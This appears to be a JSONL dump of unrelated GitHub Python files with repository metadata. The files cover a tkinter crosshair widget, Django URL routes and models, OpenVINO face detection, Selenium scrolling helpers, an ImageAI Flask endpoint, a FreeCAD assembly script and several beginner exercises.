Estimated from ' + str(int(reps)) + ' replications.'\n\ndisplay(HTML(ansStr))\ndisplay(simTable)\n\nget_ipython().run_line_magic('run', 'talkTools.py')\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/binom.py","file_name":"binom.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"44714386104","text":"from __future__ import division\nimport math\nimport sys\nif sys.version_info.major > 2:\n import tkinter as tk\nelse:\n import Tkinter as tk\n\nfrom .. import tkutil as tku\n\ntorads = math.pi / 180\ndef hit(x, y, tx, ty, vx, vy):\n \"\"\"Calculate hit point given x, y of a corner.\"\"\"\n if not vx:\n mul = (ty-y) / vy\n elif not vy:\n mul = (tx-x) / vx\n else:\n mulx = (tx-x) / vx\n muly = (ty-y) / vy\n mul = muly if abs(mulx) > abs(muly) else mulx\n return x + vx*mul, y + vy*mul\n\nclass Crosshairs(object):\n \"\"\"Crosshairs on mouse.\"\"\"\n TAG = '_crosshair'\n def __init__(self, master):\n self._vec = (1, 0)\n self.idns = [\n master.create_line(0, 0, 0, 0),\n master.create_line(0, 0, 0, 0),\n master.create_line(0, 0, 0, 0),\n master.create_line(0, 0, 0, 0)]\n for idn in self.idns:\n master.addtag(self.TAG, 'withtag', idn)\n for idn in self.idns[::2]:\n master.addtag('_crossh', 'withtag', idn)\n for idn in self.idns[1::2]:\n master.addtag('_crossv', 'withtag', idn)\n master.itemconfigure(self.TAG, state='disabled')\n for idn in self.idns[:2]:\n master.addtag('_crossb', 'withtag', idn)\n master.itemconfigure(idn, fill='black', width=3)\n for idn in self.idns[2:]:\n master.addtag('_crossf', 'withtag', idn)\n master.itemconfigure(idn, fill='white', width=1)\n tag = 'CanvasCrosshairs'\n if tag not in master.bindtags():\n tku.subclass(master, tag)\n if not master.bind_class(tag):\n tku.add_bindings(master, tag, tupit=tku.memberit(self))\n master.configure(cursor='none')\n\n def angle(self, angleorvx, vy=None, degrees=True):\n \"\"\"Set the crosshairs angle.\n\n angleorvx: angle (if vy is None) else vector x direction\n vy: if given, then the crosshair direction is (angleorvx, vy)\n degrees: if vy is None, is angleorvx in degrees or radians.\n \"\"\"\n if vy is None:\n if degrees:\n angle = (angleorvx % 90) * torads\n else:\n angle = angleorvx % (math.pi / 4)\n self._vec = (math.cos(angle), math.sin(angle))\n else:\n vx = angleorvx\n if vx * vy > 0:\n self._vec = abs(vx), abs(vy)\n else:\n if not (vx or vy):\n self._vec = (1, 0)\n else:\n self._vec = abs(vy), abs(vx)\n\n @tku.Bindings('', '')\n @classmethod\n def toggle(cls, widget):\n if widget.itemcget(cls.TAG, 'state') == 'disabled':\n widget.itemconfigure(cls.TAG, state='hidden')\n else:\n widget.itemconfigure(cls.TAG, state='disabled')\n\n @tku.Bindings('')\n @classmethod\n def show(cls, widget, x, y):\n widget.itemconfigure(cls.TAG, state='disabled')\n Crosshairs.draw_crosshairs(widget, x, y)\n\n @tku.Bindings('')\n @classmethod\n def hide(cls, widget):\n widget.itemconfigure(cls.TAG, state='hidden')\n\n @tku.Bindings('')\n @staticmethod\n def draw_crosshairs(widget, x, y):\n l, t = widget.xy(0,0)\n r, b = l+widget.winfo_width(), t+widget.winfo_height()\n x, y = widget.xy(x, y)\n self = widget.crosshairs\n i1, i2, i3, i4 = self.idns\n vx, vy = self._vec\n if vy:\n x1, y1 = hit(x, y, l, t, -vx, -vy)\n x2, y2 = hit(x, y, r, b, vx, vy)\n widget.coords(i1, x1, y1, x2, y2)\n widget.coords(i3, x1, y1, x2, y2)\n x1, y1 = hit(x, y, r, t, -vy, vx)\n x2, y2 = hit(x, y, l, b, vy, -vx)\n widget.coords(i2, x1, y1, x2, y2)\n 
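            # (comment added) i3 and i4 retrace i1 and i2 in thin white over the thick
            # black lines so the crosshair stays visible on any background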
widget.coords(i4, x1, y1, x2, y2)\n else:\n widget.coords(i1, l, y, r, y)\n widget.coords(i3, l, y, r, y)\n widget.coords(i2, x, t, x, b)\n widget.coords(i4, x, t, x, b)\n\n","repo_name":"j-hsiao/py-labeler","sub_path":"jhsiao/labeler/crosshairs.py","file_name":"crosshairs.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2148070739","text":"import arff, numpy as np\nimport pandas as pd\nimport sys\n\n# input arguments:\nif len(sys.argv) != 3:\n sys.stderr.write('USAGE: *.py \\n')\n sys.stderr.write('Convert BlueDesc output ARFF to the standard CSV file\\n')\n exit()\nfor arg in sys.argv:\n if arg == '-h' or arg == '--help':\n sys.stderr.write('USAGE: *.py \\n')\n sys.stderr.write('Convert BlueDesc output ARFF to the standard CSV file\\n')\n exit()\n\nin_file = sys.argv[1]\nout_file = sys.argv[2]\n\ndataset = arff.load(open(in_file))\ndata = np.array(dataset['data'],dtype=np.float64)\nheader = np.array(dataset['attributes'])[:, 0]\n\nmols = []\nwith open(in_file, 'r') as iFile:\n for a in iFile:\n if a[:15] =='% NAME OF MOLEC':\n mol_id = a.strip().split(' ')[-1]\n mols.append(mol_id)\n\nfinal_df = pd.DataFrame(data, columns=header)\nfinal_df.index = mols\nfinal_df.dropna(axis=1, inplace=True)\nfinal_df.index.name = 'Id'\n# Add mean values for Na3VO4\nfinal_df.loc['EOS100042'] = final_df.mean()\nsys.stdout.write(f\"added mean values for EOS100042 (Na3VO4)\\n\")\nfinal_df.to_csv(out_file)\nsys.stdout.write(f\"Shape: {final_df.shape}\\n\")\n\n","repo_name":"knawel/EUOS-SLAS","sub_path":"data/arff_to_csv.py","file_name":"arff_to_csv.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4139316401","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 7 01:47:14 2019\n\n@author: Mr.Reliable\n\"\"\"\n\n#https://www.nowcoder.com/practice/ab900f183e054c6d8769f2df977223b5?tpId=90&tqId=30789&tPage=1&rp=1&ru=%2Fta%2F2018test&qru=%2Fta%2F2018test%2Fquestion-ranking\n\n\"\"\"\n牛牛又从生物科研工作者那里获得一个任务,这次牛牛需要帮助科研工作者从DNA序列s中找出最短没有出现在DNA序列s中的DNA片段的长度。\n例如:s = AGGTCTA\n序列中包含了所有长度为1的('A','C','G','T')片段,但是长度为2的没有全部包含,例如序列中不包含\"AA\",所以输出2。\n\n输入:输入包括一个字符串s,字符串长度length(1 ≤ length ≤ 2000),其中只包含'A','C','G','T'这四种字符\n输出:输出一个正整数,即最短没有出现在DNA序列s中的DNA片段的长度。\n\neg:\nAGGTCTA\n2\n\n\"\"\"\ns = input().strip()\n#print(len(s))\nfor i in range(6):\n if 4**i <= len(s) <4**(i+1):\n k = i+1\n \n \ntmp_1 = []\nfor j in range(k):\n tmp = []\n for m in range(len(s)-j):\n tmp.append(s[m:m+j+1])\n se = set(tmp)\n if len(se) < 4**(j+1):\n tmp_1.append(j+1)\n \nprint(tmp_1[0])","repo_name":"alpharol/algorithm_python3","sub_path":"nowcoder/0014.DNA序列.py","file_name":"0014.DNA序列.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"38466301498","text":"\"\"\"begin URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.urls import path, re_path,include\nfrom .views import (\n\thome_page,\n\tcontact_page,\n\tabout_page,\n\tsmile_page,\n login_page,\n register_page,\n logout_view,\n gallery_page, \n set_timezone,\n\t)\nfrom account.views import (\n account_info_view,\n # account_update_info_view,\n user_profile,\n profile_page,\n account_detail_info_view,\n profile_create_view,\n )\nfrom blog.views import blog_post_create_view\nfrom searches.views import search_view \nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',home_page),\n re_path(r'^page/$',about_page),\n re_path(r'^pages/$',about_page),\n re_path(r'^about/$',about_page),\n path('contact/',contact_page),\n path('blog-new/',blog_post_create_view),\n path('blog/',include('blog.urls')), #by proving include('blog.urls') we give the location of the content that we have\n path('smile/',smile_page),\n path('search/',search_view),\n path('login/',login_page),\n path('logout/',logout_view),\n path('register/',register_page),\n path('avatar/',include('avatar.urls')),\n path('timezone/',set_timezone),\n path('account/',include('account.urls')),\n path('account-create/',profile_create_view),\n path('gallery/',gallery_page),\n # path('user-profile/',user_profile),\n # path('account-detail//',account_detail_info_view),\n # path('account-update/',account_update_info_view)\n]\n\nif settings.DEBUG:\n #TEST MODE\n from django.conf.urls.static import static\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"askhatov/Ask-blog","sub_path":"begin/begin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34223773375","text":"# Reference\n# https://docs.opencv.org/4.0.1/d6/d0f/group__dnn.html\n\nimport cv2\nimport imutils\nfrom imutils.video import WebcamVideoStream\n\n# Load the model\nnet = cv2.dnn.readNet('../model/face-detection-adas-0001.xml', '../model/face-detection-adas-0001.bin') \n\n# Specify target device\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)\n\n# Read the Camera\nvs = WebcamVideoStream(src=0).start()\n\nwhile True:\n # grab the frame from the threaded video stream and resize it\n # to have a maximum width of 400 pixels\n frame = vs.read()\n frame = imutils.resize(frame, width=600)\n\n\n # Prepare input blob and perform an inference\n blob = cv2.dnn.blobFromImage(frame, size=(672, 384), ddepth=cv2.CV_8U) \n\n net.setInput(blob) \n\n out = net.forward()\n\n # Draw detected faces on the frame\n for detection in out.reshape(-1, 7): \n\n confidence = float(detection[2]) \n\n xmin = int(detection[3] * frame.shape[1]) \n ymin = int(detection[4] * frame.shape[0]) \n\n xmax = int(detection[5] * frame.shape[1]) \n ymax = int(detection[6] * frame.shape[0])\n\n if confidence > 0.5:\n cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, 255, 0))\n \n cv2.imshow(\"Frame\", frame)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n\n# do a bit of cleanup\ncv2.destroyAllWindows()\nvs.stop()","repo_name":"HsinM/OpenVINO-NCS","sub_path":"pi_code/face/code/webcam_test.py","file_name":"webcam_test.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} 
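A small companion sketch for the OpenVINO face-detection sample above. It is an editor-added illustration, not part of the original repository; the helper name label_detections is invented here, and it assumes the same net / frame / out variables that the sample's capture loop defines:

# Hypothetical helper, sketched under the assumptions stated above: overlay each
# detection's confidence score on the frame after net.forward() has produced `out`.
def label_detections(frame, out, threshold=0.5):
    # each row of out.reshape(-1, 7) is [image_id, label, conf, xmin, ymin, xmax, ymax],
    # matching the indexing the sample itself uses when drawing rectangles
    for detection in out.reshape(-1, 7):
        confidence = float(detection[2])
        if confidence > threshold:
            xmin = int(detection[3] * frame.shape[1])
            ymin = int(detection[4] * frame.shape[0])
            # draw the score just above the top-left corner of the detection box
            cv2.putText(frame, "face %.2f" % confidence, (xmin, max(ymin - 5, 0)),
                        cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1)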
+{"seq_id":"42230743988","text":"\nfrom .base_strategy import BaseStrategy\n\nclass SAR(BaseStrategy):\n NAME = 'sar'\n # Feature, Bias, Scaler\n FEATURES = [\n ['sar_bias', 0, 5],\n ['sar_diff', 0, 30],\n ['sar_diff_pre', 0, 30],\n ['change', 0, 10],\n ['amp_0105', 0, 2],\n ['amp_0510', 0, 1],\n ]\n DNA_LEN = len(FEATURES)*2\n","repo_name":"hellojixian/stock-ai","sub_path":"lib/indicators/sar.py","file_name":"sar.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"} +{"seq_id":"44074281615","text":"import requests\n\napi_base = 'https://icanhazdadjoke.com/'\n\nheaders = {'accept': 'application/json'}\n\nprint('---------HERE ARE 10 JOKES HAHAHAHA------------')\nfor x in range(10):\n response = requests.get(api_base, headers)\n\n if response.status_code == 200:\n resp_as_json = response.json()\n print(resp_as_json['joke'])\n else:\n print('Oops... didn\\'t work')\n","repo_name":"cecilphillip/python-stream","sub_path":"src/dadjokes.py","file_name":"dadjokes.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"} +{"seq_id":"29533268887","text":"import numpy as np\nnp.random.seed(1)\nimport sys\n\ndef relu(x):\n return (x>0)*x\n\ndef relu2deriv(output):\n return (output>0)\n\n# Input data\n\nalpha,iterations=(0.1,100)\npixels_per_image,num_labels,hidden_size=(784,10,100)\n\nweights_0_1=0.2*np.random.random((pixels_per_image,hidden_size))-0.1\nweights_1_2=0.2*np.random.random((hidden_size,num_labels))-0.1\n\nfor j in xrange(iteratins):\n error=0\n correct_cnt=0\n for i in xrange(len(images)/batch_size):\n batch_start,batch_end=((i*batch_size),((i+1)*batch_size))\n layer_0=images[batch_start:batch_end]\n layer_1=relu(np.dot(layer_0,weights_0_1))\n dropout_mask=np.random.randint(2,size=layer_1.shape)\n layer_1*=dropout_mask\n layer_2=np.dot(layer_1,weights_1_2)\n \n error+=np.sum((labels[batch_start:batch_end]-layer_2)**2)\n \n for k in xrange(batch_size):\n correct_cnt+=int(np.argmax(layer_2[k:k+1])==np.argmax(labels[batch_start+k:batch_start+k+1]))\n \n delta_layer_2=(layer_2-labels[batch_start:batch_end])/batch_size\n delta_layer_1=delta_layer_2.dot(weights_1_2.T)*relu2deriv(layer_1)\n \n delta_layer_1*=dropout_mask\n \n weights_1_2-=alpha*layer_1.T*dot(delta_layer_2)\n weights_0_1-=alpha*layer_0.T*dot(delta_layer_1)\n \n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/4. Batch Gradient Descent.py","file_name":"4. 
Batch Gradient Descent.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20700099591","text":"import os\nimport sys\nimport csv\n\n\ndef fileAccess():\n\twith open('test.txt') as f:\n\t\tfor line in f:\n\t\t\tprint(line.strip())\n\n\tprint('-------------------------------------------------------------------')\n\n\twith open('test2.csv') as cf:\n\t\treader = csv.reader(cf, delimiter=' ')\n\t\twith open('test3.csv', 'w') as cf2:\n\t\t\twriter = csv.writer(cf2, delimiter=' ')\n\t\t\tfor row in reader:\n\t\t\t\twriter.writerow([row[1]])\n\t\n\t\ndef main():\n fileAccess()\n\nif __name__ == '__main__':\n main()\t\n","repo_name":"ShashwathKumar/PythonTests","sub_path":"JARVIS/fileWrites/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"41559602437","text":"# Name: Basemaps\n# Author: Marios S. Kyriakou, KIOS Research and Innovation Center of Excellence (KIOS CoE)\n# Email: mariosmsk@gmail.com\n# License: MIT\n\n# This plugin works with EPANET MTP4r2:\n# https://github.com/USEPA/SWMM-EPANET_User_Interface/releases/tag/MTP4r2\nimport os\n\nplugin_name = \"Basemaps\"\nplugin_create_menu = True\n__all__ = {\"Google Satellite\":1, \"Openstreetmap\":2}\n\n\ndef checkBasemaps(session, mapname):\n status = True\n for tlayer in session.map_widget.base_group.findLayers():\n if tlayer.layer().name() == mapname:\n session.map_widget.remove_layers([tlayer.layer()])\n session.map_widget.base_group.removeChildNode(tlayer)\n status = False\n break\n return status\n\ndef run(session=None, choice=None):\n\n path = os.getcwd() + \"\\\\plugins\\\\Basemaps\\\\\"\n if choice is None:\n choice = 99\n if choice == 1:\n mapname = \"Google Satellite.xml\"\n status = checkBasemaps(session, mapname)\n if not status:\n return\n\n elif choice == 2:\n mapname = \"Openstreetmap.xml\"\n status = checkBasemaps(session, mapname)\n if not status:\n return\n\n if choice ==1 or choice == 2:\n urlWithParams = path + mapname\n session.map_widget.addRasterLayer(urlWithParams)\n session.map_widget.refresh_extent_needed = False\n","repo_name":"ppavlo02/EPANET-Plugins","sub_path":"Basemaps/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"9729459135","text":"import numpy as np\nfrom nbayes2 import *\nimport timeit\n\n# def cmp_NaiveBayes():\ndata = np.genfromtxt('vote_filled.tsv', dtype = int)\nX = data[:, :-1]\ny = data[:, -1]\n\nclr1 = NaiveBayes1()\nclr1.fit(X, y)\nprint(clr1.fit(X, y))\n\nclr2 = NaiveBayes2()\nclr2.fit(X, y)\nprint(clr2.fit(X, y))\n\n# if __name__ == '__main__':\n\n## timeit setups ( 100 hundred exe)\nprint(timeit.timeit(\"print('ie-i')\", setup=\"print('Start timeit')\", number = 100))\nprint(\"NaiveBayes1 = \", timeit.timeit(NaiveBayes1))\nprint(\"NaiveBayes2 = \", timeit.timeit(NaiveBayes2))\n# print(timeit.timeit(clr1.fit(X, y)))\n# print(timeit.timeit(clr2.fit(X, y)))\n","repo_name":"jusui/Data_Science","sub_path":"ML_algorithm/nbayes_1/cmp_NaiveBayes.py","file_name":"cmp_NaiveBayes.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28426454932","text":"\"\"\" \r\nUzrakstiet programmu, kas ielasa skaitli (kā float) -\r\nriņķa līnijas rādiusu un 
prints (print) to the screen \r\nthe circumference and the area of the circle, formatting the answer appropriately.\r\nTest the program with various input data.\r\n\"\"\"\r\n\r\nrādius=float(input(\"Enter the radius!\"))\r\n\r\nlaukums=3.14*(rādius*rādius)\r\nlinijas_garums=2*3.14*rādius\r\n\r\nprint(\"The area of the circle is:\",laukums)\r\nprint(\"The circumference of the circle is:\",linijas_garums)","repo_name":"elinaavintisa/praktikums_Python","sub_path":"uzd1.py","file_name":"uzd1.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"lv","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"35489474866","text":"import time\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\n\nGET_WINDOW_YOFFSET_SCRIPT = \"return window.pageYOffset;\"\n\n\ndef configure_driver(path: str, is_headless: bool = True) -> WebDriver:\n \"\"\"\n Creates a Chrome WebDriver instance.\n\n :param path: Path to the Chrome WebDriver executable\n :param is_headless: Specifies whether to run the driver in headless mode\n :return: A Chrome WebDriver instance\n \"\"\"\n chrome_options = Options()\n chrome_options.headless = is_headless\n driver = webdriver.Chrome(executable_path=path, options=chrome_options)\n\n return driver\n\n\ndef scroll_down(driver: WebDriver):\n \"\"\"\n Scrolls the webpage down from the current Y position\n\n :param driver: The Chrome WebDriver instance\n \"\"\"\n scroll_pos = driver.execute_script(GET_WINDOW_YOFFSET_SCRIPT)\n scroll = scroll_pos + 250\n driver.execute_script(\"window.scrollTo(0, \" + str(scroll) + \");\")\n\n # Wait for scroll to execute\n time.sleep(.5)\n\n\ndef scroll_until_find_by_class_name(class_name: str, driver: WebDriver, parent=None):\n \"\"\"\n Looks for a WebElement object by class name by scrolling down the entire webpage.\n If a parent WebElement is provided it will only search through its children WebElements.\n\n :param class_name: The WebElement class name to search for.\n :param driver: The Chrome WebDriver instance\n :param parent: (Optional) A Parent WebElement object\n :return: A WebElement object matching the given class name or None if no WebElement was found.\n \"\"\"\n # Start at top of screen\n driver.execute_script(\"window.scrollTo(0, 0);\")\n time.sleep(1)\n last_pos = driver.execute_script(GET_WINDOW_YOFFSET_SCRIPT)\n\n element = None\n while element is None:\n try:\n if parent is None:\n element = driver.find_element(By.CLASS_NAME, class_name)\n else:\n element = parent.find_element(By.CLASS_NAME, class_name)\n except NoSuchElementException:\n scroll_down(driver)\n new_pos = driver.execute_script(GET_WINDOW_YOFFSET_SCRIPT)\n if last_pos != new_pos:\n last_pos = new_pos\n else:\n return None\n return element\n","repo_name":"Nicholas-C-Brown/COSC419F-Project","sub_path":"src/helper_methods/driver_helper.py","file_name":"driver_helper.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"1058343667","text":"class CapturedPacket:\n\tdef __init__(self, number, id, type, xfer_type, epnum, devnum, busnum, setup, length, data):\n\t\tself.number = number\n\t\tself.id = id\n\t\tself.type = type\n\t\tself.xfer_type = xfer_type\n\t\tself.epnum = epnum\n\t\tself.devnum = devnum\n\t\tself.busnum = busnum\n\t\tself.setup = setup\n\t\tself.length = 
length\n\t\tself.data = data\n","repo_name":"aib/usb-pcap","sub_path":"usb_pcap/packet.py","file_name":"packet.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"24688780479","text":"import datetime\n\nimport requests\nfrom django.contrib.auth import get_user_model\nfrom django.db import models\n\nfrom fishingbs.accounts.models import Profile\nfrom fishingbs.accounts.validators import image_max_size_validator\nfrom fishingbs.mixins import mixins as get\n\n\nUserModel = get_user_model()\n\n\nclass GiveInformationModel(models.Model):\n FISH_TYPES = get.get_fish_types()\n LOCATIONS = get.get_locations_for_news()\n INTENSITIES = get.get_intensities()\n CATCHING_TYPES = get.get_catching_types()\n MAX_LENGTH_FISH_TYPES = get.get_max_length_of_a_sequence(FISH_TYPES)\n MAX_LENGTH_LOCATIONS = get.get_max_length_of_a_sequence(LOCATIONS)\n MAX_LENGTH_INTENSITIES = get.get_max_length_of_a_sequence(INTENSITIES)\n MAX_LENGTH_CATCHING_TYPES = get.get_max_length_of_a_sequence(CATCHING_TYPES)\n\n fish_type = models.CharField(\n max_length=MAX_LENGTH_FISH_TYPES,\n choices=FISH_TYPES,\n blank=False,\n null=False,\n )\n location = models.CharField(\n max_length=MAX_LENGTH_LOCATIONS,\n choices=LOCATIONS,\n blank=False,\n null=False,\n )\n intensity = models.CharField(\n max_length=MAX_LENGTH_INTENSITIES,\n choices=INTENSITIES,\n blank=False,\n null=False,\n )\n last_most_intense = models.TimeField(\n default=datetime.datetime.now,\n blank=False,\n null=False,\n )\n type_of_catching = models.CharField(\n max_length=MAX_LENGTH_CATCHING_TYPES,\n choices=CATCHING_TYPES,\n blank=False,\n null=False,\n )\n photo = models.ImageField(\n upload_to='catches/',\n validators=[\n image_max_size_validator,\n ],\n blank=True,\n null=True,\n )\n comment = models.TextField(\n max_length=1500,\n blank=True,\n null=True,\n )\n created_on = models.DateTimeField(\n auto_now_add=True,\n )\n from_user = models.ForeignKey(\n Profile,\n on_delete=models.CASCADE,\n blank=False,\n null=False,\n default=1,\n )\n\n","repo_name":"Lasabito/fishing_bs","sub_path":"fishingbs/fishingbs/news/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"7530642537","text":"from imageai.Detection import ObjectDetection, keras_retinanet\r\nimport os\r\nfrom PIL import Image\r\nimport base64\r\nimport logging as log\r\nfrom flask import Flask, request, make_response\r\nfrom flask_restful import Resource, Api\r\nimport flask_restful as restful\r\nfrom keras.engine.saving import load_model\r\nfrom sqlalchemy import create_engine\r\nfrom json import dumps\r\nfrom flask import jsonify\r\nfrom flask_classful import FlaskView\r\nimport json\r\nfrom keras import backend as K\r\nimport tensorflow as tf\r\nfrom tkinter.filedialog import askopenfilename\r\nfrom pathlib import Path\r\nfrom tkinter import Tk\r\n\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nresult = dict()\r\n\r\n\r\ndef init():\r\n global model, graph\r\n # load the pre-trained Keras model\r\n # model = load_model('resnet50_coco_best_v2.0.1.h5')\r\n graph = tf.get_default_graph()\r\n\r\nTk().withdraw()\r\nfilename = askopenfilename()\r\nimg = Path(filename).name\r\nwith open(filename, \"rb\") as imageFile:\r\n # converting download.jpg to a String\r\n str_file = base64.b64encode(imageFile.read())\r\n print(str_file)\r\n\r\n\r\napp = Flask(__name__, 
template_folder='template')\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\",\"POST\"])\r\ndef predict():\r\n with graph.as_default():\r\n fh = open(\"imageToSave.png\", \"wb\")\r\n fh.write(base64.decodebytes(str_file)) # decodebytes replaces base64.decodestring, which was deprecated and removed in Python 3.9\r\n fh.close()\r\n log.debug(\"File decrypted !!\")\r\n filename = \"imageToSave.png\"\r\n\r\n log.basicConfig(filename=\"logs.log\", level=log.DEBUG)\r\n # giving the filename\r\n # filename = \"image.jpg\"\r\n execution_path = os.getcwd()\r\n\r\n # creating the detector object for ObjectDetection\r\n log.info(\"Detector activated \")\r\n detector = ObjectDetection()\r\n detector.setModelTypeAsRetinaNet()\r\n detector.setModelPath(os.path.join(execution_path, \"resnet50_coco_best_v2.0.1.h5\"))\r\n detector.loadModel()\r\n detections = detector.detectObjectsFromImage(input_image=filename,\r\n output_image_path=os.path.join(execution_path, \"imagenew.jpg\"))\r\n\r\n # printing the found object names and the probability value\r\n result = dict()\r\n\r\n for eachObject in detections:\r\n # print(eachObject[\"name\"], \" : \", eachObject[\"percentage_probability\"])\r\n result.update({eachObject[\"name\"]: eachObject[\"percentage_probability\"]})\r\n\r\n print(result)\r\n return sendResponse(result)\r\n # NOTE: the statements below never run because they follow the return above\r\n K.clear_session()\r\n # displaying image after object detection\r\n img = Image.open('imagenew.jpg')\r\n img.show()\r\n\r\n # passing a string value of image to object\r\n # object detect class gets inherited from imageconvert\r\n\r\n if request.method=='POST':\r\n return result\r\n\r\n@app.route('/form', methods=['GET', 'POST'])\r\ndef form_example():\r\n if request.method == 'POST':\r\n with graph.as_default():\r\n fh = open(\"imageToSave.png\", \"wb\")\r\n fh.write(base64.decodebytes(str_file))\r\n fh.close()\r\n log.debug(\"File decrypted !!\")\r\n filename = \"imageToSave.png\"\r\n\r\n log.basicConfig(filename=\"logs.log\", level=log.DEBUG)\r\n # giving the filename\r\n # filename = \"image.jpg\"\r\n execution_path = os.getcwd()\r\n\r\n # creating the detector object for ObjectDetection\r\n log.info(\"Detector activated \")\r\n detector = ObjectDetection()\r\n detector.setModelTypeAsRetinaNet()\r\n detector.setModelPath(os.path.join(execution_path, \"resnet50_coco_best_v2.0.1.h5\"))\r\n detector.loadModel()\r\n detections = detector.detectObjectsFromImage(input_image=filename,\r\n output_image_path=os.path.join(execution_path, \"imagenew.jpg\"))\r\n\r\n # printing the found object names and the probability value\r\n result = dict()\r\n\r\n for eachObject in detections:\r\n # print(eachObject[\"name\"], \" : \", eachObject[\"percentage_probability\"])\r\n result.update({eachObject[\"name\"]: eachObject[\"percentage_probability\"]})\r\n\r\n print(result)\r\n return sendResponse(result)\r\n K.clear_session() # unreachable: follows the return above\r\n\r\n return '''
<form method=\"POST\">\r\n Image string: <input type=\"text\" name=\"image_string\">
\r\n <input type=\"submit\" value=\"Submit\">
\r\n</form>
'''\r\n\r\n\r\ndef sendResponse(responseObj):\r\n response = jsonify(responseObj)\r\n return response\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print((\"* Loading Keras model and Flask starting server...\"\r\n \"please wait until server has fully started\"))\r\n init()\r\n app.run(threaded=True, debug=True, port=9000)\r\n","repo_name":"nikzjadhav/Object-detection-flask","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":4691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37228837022","text":"# sum of the digits of a natural number\r\n# input(n)\r\n# s = 0\r\n# while n > 0 do\r\n#{\r\n# s = s + n mod 10\r\n# n = n div 10\r\n#}\r\n#############################\r\n\r\nn = int(input(\"Enter a number: \"))\r\nn0 = n\r\ns = 0\r\nwhile n > 0 :\r\n s = s + n % 10\r\n n = n // 10\r\nprint(\"The digit sum of \" +str(n0)+ \" is \" +str(s))\r\n","repo_name":"nekm/Informatika_matura","sub_path":"2019_j_18.py","file_name":"2019_j_18.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"hr","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"44374684744","text":"# Importing standard libs\nimport os\nimport sys\n\n# Insert this directory into the PYTHONPATH to import experimental parameters from experiment_params.py\n# (\"${HOME}\" is a shell variable and is not expanded by Python, so expanduser is used instead)\nsys.path.insert(0, os.path.expanduser(\"~/work/git/Lab-Management/freecad_models/EM_Coupling_Experiment/code\"))\n\n# Insert this directory into the PYTHONPATH to import Assembly 2 module\nsys.path.append(os.path.expanduser('~/.FreeCAD/Mod/FreeCAD_assembly2'))\n\n# Importing Assembly 2 libraries\n# Assembly2 is an additional FreeCAD workbench (https://github.com/hamish2014/FreeCAD_assembly2)\nimport importPart\nimport planeConstraint\nimport 